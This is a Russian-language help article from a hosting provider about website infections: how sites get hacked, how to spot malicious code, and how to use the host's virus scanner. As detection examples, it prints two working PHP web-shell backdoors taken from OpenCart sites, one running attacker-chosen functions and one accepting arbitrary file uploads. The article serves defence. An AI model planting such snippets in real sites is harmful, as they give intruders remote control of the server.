Что делать, если сайт заражен вирусом и откуда они берутся?

Чем отличаются вирусы на сайтах и на компьютерах

Вирусы на сайте и вирусы на домашнем или рабочем компьютере это не одно и то же.

Код сайта состоит из обычных текстовых файлов. Вирусы на сайте это такой же программный код. Причем визуально он может не отличаться от остального кода сайта.

Как вирусы на сайте могут навредить

Сайты с вирусами понижаются в рейтинге поисковых систем. Как следствие трафик на такие сайты падает. А если попасть в базу зараженных сайтов, то в браузере у посетителей будет отображаться предупреждение о зараженном сайте.

Как появляются вирусы на сайте

1. Взлом сайта через уязвимости

В Wordpress, Joomla, Drupal и других системах управления содержимым сайта (CMS) периодически находят уязвимости. Чем более популярна CMS, тем выгоднее злоумышленникам найти в ней уязвимость, ведь это открывает доступ сразу к десяткам тысяч сайтов.

Стоит регулярно обновлять CMS до последней версии.

2. Подбор пароля от панели управления сайтом

Проверьте, что для административной части вашего сайта установлен надежный пароль.

3. Перехват доступов от FTP

При подключении по FTP логин и пароль передаются в открытом виде, и их могут перехватить злоумышленники. Рекомендуем подключаться по SFTP.

4. Заражение от другого сайта

Если на одной учетной записи размещаются несколько сайтов, то один зараженный сайт может заразить другие.

Мы предусмотрели защиту от этого на всех тарифах Хостинга - каждый сайт там изолирован. Даже если злоумышленники загрузят вирус на какой-либо из ваших сайтов, то другие сайты не пострадают. Более того - злоумышленники даже не смогут узнать об существовании других сайтов.

Как вручную найти вирус

Можно последовательно открывать файлы сайта и обращать внимание на каждый фрагмент кода, назначение которого вызывает вопросы. Два примера вредоносного кода, который внедрялся на сайт на CMS OpenCart:

<?php if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK';} else { echo 'You are forbidden!';} ?>

<?php if (isset($_FILES['F1l3'])) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;};

Либо код может выглядеть нечитаемым. Это обычная техника для вредоносных программ. Вот пример кода, зашифрованного в base64:

0K3RgtC+INGC0LXRgdGC0L7QstGL0LkgYmFzZTY0INC60L7QtC4g0JfQsNGH0LXQvCDQstGLINGN0YLQviDRgNCw0YHRiNC40YTRgNC+0LLQsNC70Lg/IDopIAoKMEszUmd0QytJTkdDMExYUmdkR0MwTDdRc3RHTDBMa2dZbUZ6WlRZMElOQzYwTDdRdEM0ZzBKZlFzTkdIMExYUXZDRFFzdEdMSU5HTjBZTFF2aURSZ05DdzBZSFJpTkM0MFlUUmdOQyswTExRc05DNzBMZy9JRG9w

Расшифровать base64 можно, например, на сайте base64.ru.

Очистка зараженного сайта вручную это кропотливая работа, проще будет воспользоваться готовыми антивирусами.

Как автоматически найти и вылечить вирус

На всех тарифах Хостинга возможно запустить проверку на вирусы.

Проверка выполняется антивирусом AI-Bolit от компании Revisium. Это один из самых популярных антивирусов для сайтов в Рунете.

Кроме проверки автоматика попробует провести еще и лечение.

1. Откройте панель управления

2. Кликните по нужному сайту

3. Кликните “Проверить на вирусы”

4. Отчет придет на вашу электронную почту.

Лечение сайта лишь устранит последствия взлома, но не его причины, и вполне вероятно, что через небольшой промежуток времени сайт вновь подвергнется взлому.

Необходимо выяснить, каким образом было выполнено заражение, и закрыть все найденные уязвимости на сайте. Для этого лучше связаться с разработчиками вашего сайта.

Кроме этого мы рекомендуем:

• изменить реквизиты подключения FTP в панели управления хостингом, в настройках сайта на вкладке “Файлы”
• обновить используемую систему управления сайтом (CMS) и все ее плагины-расширения.